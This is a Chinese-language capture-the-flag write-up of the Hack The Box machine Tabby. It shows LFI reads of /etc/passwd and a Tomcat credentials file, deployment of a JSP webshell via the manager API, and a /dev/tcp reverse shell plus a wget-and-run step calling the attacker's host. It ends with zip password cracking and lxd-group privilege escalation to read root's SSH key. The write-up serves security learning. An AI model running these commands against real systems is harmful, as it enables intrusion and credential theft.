HTB-靶机-Tabby

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.194

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

信息枚举收集
https://github.com/codingo/Reconnoitre 跟autorecon类似
autorecon 10.10.10.194 -o ./Tabby-autorecon

masscan -p1-65535 10.10.10.194 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.194
sudo nmap -sS -sV -T4 -O -A -v 10.10.10.194

nmap自动探测工具
https://github.com/21y4d/nmapAutomator

爆破目录新工具
https://github.com/phra/rustbuster

就开放了3个端口，先看web应用，访问之前先追加要给hosts文件，然后使用域名访问，这里一个新姿势追加hosts文件内容

sudo -- sh -c "echo '10.10.10.194 megahosting.htb' >> /etc/hosts"

经过测试访问所有能看到的页面，根据经验确认存在文件包含漏洞

看到可疑的连接测试确认存在文件包含
http://megahosting.htb/news.php?file=../../../../etc/passwd

从上面来看确认目标存在一个普通用户ash，这个后面会用的到，再看看8080端口

根据显示就是默认安装了tomcat，然后所有默认的页面也给出了展示，只不过提示说安全原因禁止了管理员登录manager-gui ，并且提示默认定义位置配置文件/etc/tomcat9/tomcat-users.xml 到这里知道他们的后台地址，而且又是tomcat，就要想办法通过LFI读取目标靶机的敏感信息，获取账号密码，这里通过Google搜索关键字，和上面的提示，找到了存放用户名密码的配置文件路径，相关参考：

https://packages.debian.org/buster/all/tomcat9-docs/filelist

访问http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
查看源码内容，确认可以读取xml文件内容，获取账号和密码

   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

显示空白，然后查看网页源码

这里刚开始直接登录后台搞，没成功擦，那再爆破下目录吧，这里就是wfuzz进行web应用模糊测试

wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404 http://10.10.10.194:8080/manager/FUZZ

爆破出来了几个401认证的文件，其中有一个text路径，网上搜索/manager/text相关的信息，确认有可利用的地方，参考：

https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html

测试验证一把

USERNAME=tomcat
PASSWORD=$3cureP4s5w0rd123!
curl -u ${USERNAME}:${PASSWORD} http://10.10.10.194:8080/manager/text/list

kali@kali:~/Downloads/htb/tabby$ USERNAME=tomcat
kali@kali:~/Downloads/htb/tabby$ PASSWORD=$3cureP4s5w0rd123!
kali@kali:~/Downloads/htb/tabby$ curl -u ${USERNAME}:${PASSWORD} http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:1:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
kali@kali:~/Downloads/htb/tabby$

 再网上搜索一把利用方式，可以拿个webshell，通过manager/text接口部署webshell，可参考：https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html

打包cdm.jsp为war文件
zip cntfshell.war cmd.jsp
也可以使用jar进行打包war
jar cvf shitshell.war cmdjsp.jsp

使用接口上传webshell
curl -u ${USERNAME}:${PASSWORD} -T cntfshell.war http://10.10.10.194:8080/manager/text/deploy?path=/webshell&update=true

jsp的webshell地址：https://gist.github.com/ErosLever/7445a3cfaaf80f1f5a53

 成功获取webshell并可正常执行命令，使用此种方式进行反弹shell

echo "0<&196;exec 196<>/dev/tcp/10.10.14.16/8833; sh <&196 >&196 2>&196" > shell
详细的反弹shell参数解释：https://blog.csdn.net/qq_17204441/article/details/97341408
wget http://10.10.14.16:8000/shell -O /tmp/shell ; chmod +x /tmp/shell ; bash /tmp/shell
升级tty-shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

上面是通过本地kali生成好shell文件，然后通过python搭建简易web服务器下载到目标靶机上执行反弹shell

通过在靶机上信息搜集发现/var/www/html/files目录下有个备份文件zip文件，解压发现要密码，又没有ssh的账号和密码，苛刻的环境下使用base64编码的形式传输文件，使用base64的方式传文件， 这里使用到base64 -w0的参数，目的是为了其生成的base64编码没有换行符，简单点理解就是生成连续的字符串，下面是base64编码的内容输出到本地kali

echo "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" | base64 -d -w0 > backup.zip

开始进行字典破解压缩文件的密码

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt backup.zip

得到密码：admin@it  试了试su切换登录到目标用户ash，成功了

拿到ash用户权限之后执行id和groups发现有lxd 直接使用lxd进行提权

相关具体命令如下：

开始提权前的准备
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
./build-alpine
上述操作完成之后会生成一个tar.gz的包，alpine-v3.13-x86_64-20210511_1405.tar.gz 
然后通过下载的方式下载到目标靶机
wget http://10.10.14.16:8000/alpine-v3.13-x86_64-20210511_1405.tar.gz

lxd init   -- 一路回车
lxc image import ./alpine-v3.12-x86_64-20201106_2000.tar.gz --alias cntf
lxc image list
lxc init alpine mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
cat /mnt/root/root/root.txt
或者
cat /mnt/root/root/.ssh/id_rsa
mousepad tabby_id_rsa
chmod 400 tabby_id_rsa
ssh -i tabby_id_rsa 10.10.10.194 -l root